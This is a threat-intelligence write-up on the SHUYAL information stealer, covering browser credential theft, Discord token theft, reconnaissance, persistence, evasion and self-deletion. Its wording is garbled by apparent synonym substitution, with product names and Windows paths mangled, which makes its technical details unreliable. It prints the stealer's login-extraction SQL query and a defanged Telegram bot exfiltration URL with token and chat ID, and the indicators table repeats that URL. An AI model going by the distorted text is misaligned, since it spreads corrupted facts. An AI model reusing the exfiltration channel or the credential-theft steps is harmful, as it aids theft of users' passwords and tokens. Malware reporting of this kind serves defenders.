A classy new data stealer named SHUYAL was not too long ago found by Hybrid Evaluation.
It has demonstrated intensive capabilities in credential extraction from 19 totally different net browsers, together with common ones like Google Chrome, Microsoft Edge, Opera, Courageous, and Yandex, in addition to extra specialised ones like Opera GX, Vivaldi, Chromium, Waterfox, Tor, Epic Privateness Browser, Comodo Dragon, Slimjet, Coc Coc, Maxthon, 360 Safe Browser, UR Browser, Avast Safe Browser, and Falkon.
Named after distinctive identifiers within the executable’s PDB path, which additionally references a “sheepy” username, SHUYAL represents a beforehand undocumented menace that integrates complete browser focusing on with superior system reconnaissance.
Superior Capabilities in Credential Theft
The malware performs detailed enumeration of {hardware} elements, retrieving fashions and serial numbers of disk drives by way of WMIC instructions, alongside descriptions and gadget IDs for keyboards, pointing units like mice, and desktop screens.
This reconnaissance extends to querying the desktop wallpaper path utilizing PowerShell, though incomplete instructions like “wmic get title” yield no actionable information.
Past {hardware} profiling, SHUYAL captures screenshots utilizing GDI+ APIs similar to GdiplusStartup, BitBlt, and GdipSaveImageToFile, saving them as “ss.png,” and extracts clipboard contents by way of OpenClipboard and GetClipboardData, storing them in “clipboard.txt.”
It additional targets Discord purposes commonplace, Canary, and PTB stealing authentication tokens, that are logged alongside browser information in recordsdata like “tokens.txt” and “debug_log.txt” inside a short lived “runtime” listing.
SHUYAL’s operational sophistication is obvious in its evasion techniques, together with the aggressive termination of the Home windows Job Supervisor course of by way of TerminateProcess calls, adopted by disabling it completely by setting the “DisableTaskMgr” registry key to 1 underneath HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem.
This prevents customers from monitoring or interrupting the malware’s actions. For persistence, the stealer leverages the SHGetSpecialFolderPathA API to find the person’s Startup folder (CSIDL_STARTUP) and copies itself there utilizing CopyFileA, guaranteeing computerized execution on system boot.
Credential theft is executed meticulously: the malware locates “Login Information” databases from the focused browsers, copies them to the present listing (e.g., “chrome_Data.db” for Chrome), and runs SQL queries like “SELECT origin_url, username_value, password_value FROM logins” to extract credentials.
Passwords are decrypted utilizing the browser’s grasp key from the “Native State” file, processed by way of DPAPI’s CryptUnprotectData after Base64 decoding, and saved in “saved_passwords.txt.”
Shopping historical past is equally pilfered from recordsdata like “Consumer DataDefaultHistory” and saved as “historical past.txt,” demonstrating a radical method to information aggregation.
Self-Deletion Mechanisms
To take care of stealth, SHUYAL employs trendy exfiltration strategies, compressing the “runtime” listing into “runtime.zip” by way of PowerShell’s Compress-Archive cmdlet and transmitting it to a Telegram bot at hxxps://api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjQ/sendDocument?chat_id=-1002503889864.
This combines Discord token theft with Telegram-based information relay, guaranteeing environment friendly command-and-control communication.
Community occasions are monitored utilizing WSAEnumNetworkEvents for socket-based detections, including one other layer of operational consciousness.
In line with the Report, Publish-exfiltration, the malware deletes traces by eradicating created database copies and runtime recordsdata, enhancing its anti-forensic profile.
Lastly, self-deletion is achieved by way of a batch script “util.bat,” which makes use of instructions like “timeout /t 1 /nobreak >nul” and “del /f /q” to erase the executable itself after a delay, leaving minimal footprints.
This in-depth examination, mixing Hybrid Evaluation’s behavioral indicators with static and dynamic disassembly, underscores SHUYAL’s position as a flexible infostealer.
It not solely grabs credentials but additionally conducts system reconnaissance, evades detection, and exfiltrates information stealthily, posing important dangers to customers throughout numerous browser ecosystems.
Safety groups are suggested to observe for these patterns, leveraging vetted entry to Hybrid Evaluation for pattern downloads and additional reverse engineering to develop strong defenses towards such threats.
Indicators of Compromise (IOCs)
| Class | Indicator |
|---|---|
| SHA256 | 810d4850ee216df639648a37004a0d4d1275a194924fa53312d3403be97edf5c |
| Information Created | C:Customers C:Customers C:Customers C:Customers C:Customers C:Customers C:Customers util.bat |
| Processes Spawned | wmic diskdrive get mannequin,serialnumber wmic path Win32_Keyboard get Description,DeviceID wmic path Win32_PointingDevice get Description,PNPDeviceID wmic path Win32_DesktopMonitor get Description,PNPDeviceID wmic get title powershell -command “(Get-ItemProperty ‘HKCU:Management PanelDesktop’).Wallpaper” powershell -Command “Compress-Archive -Path ‘C:Customers |
| Telegram Bot | hxxps[:]//api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjQ/sendDocument?chat_id=-1002503889864 |
Get Free Final SOC Necessities Guidelines Earlier than you construct, purchase, or swap your SOC for 2025 - Obtain Now
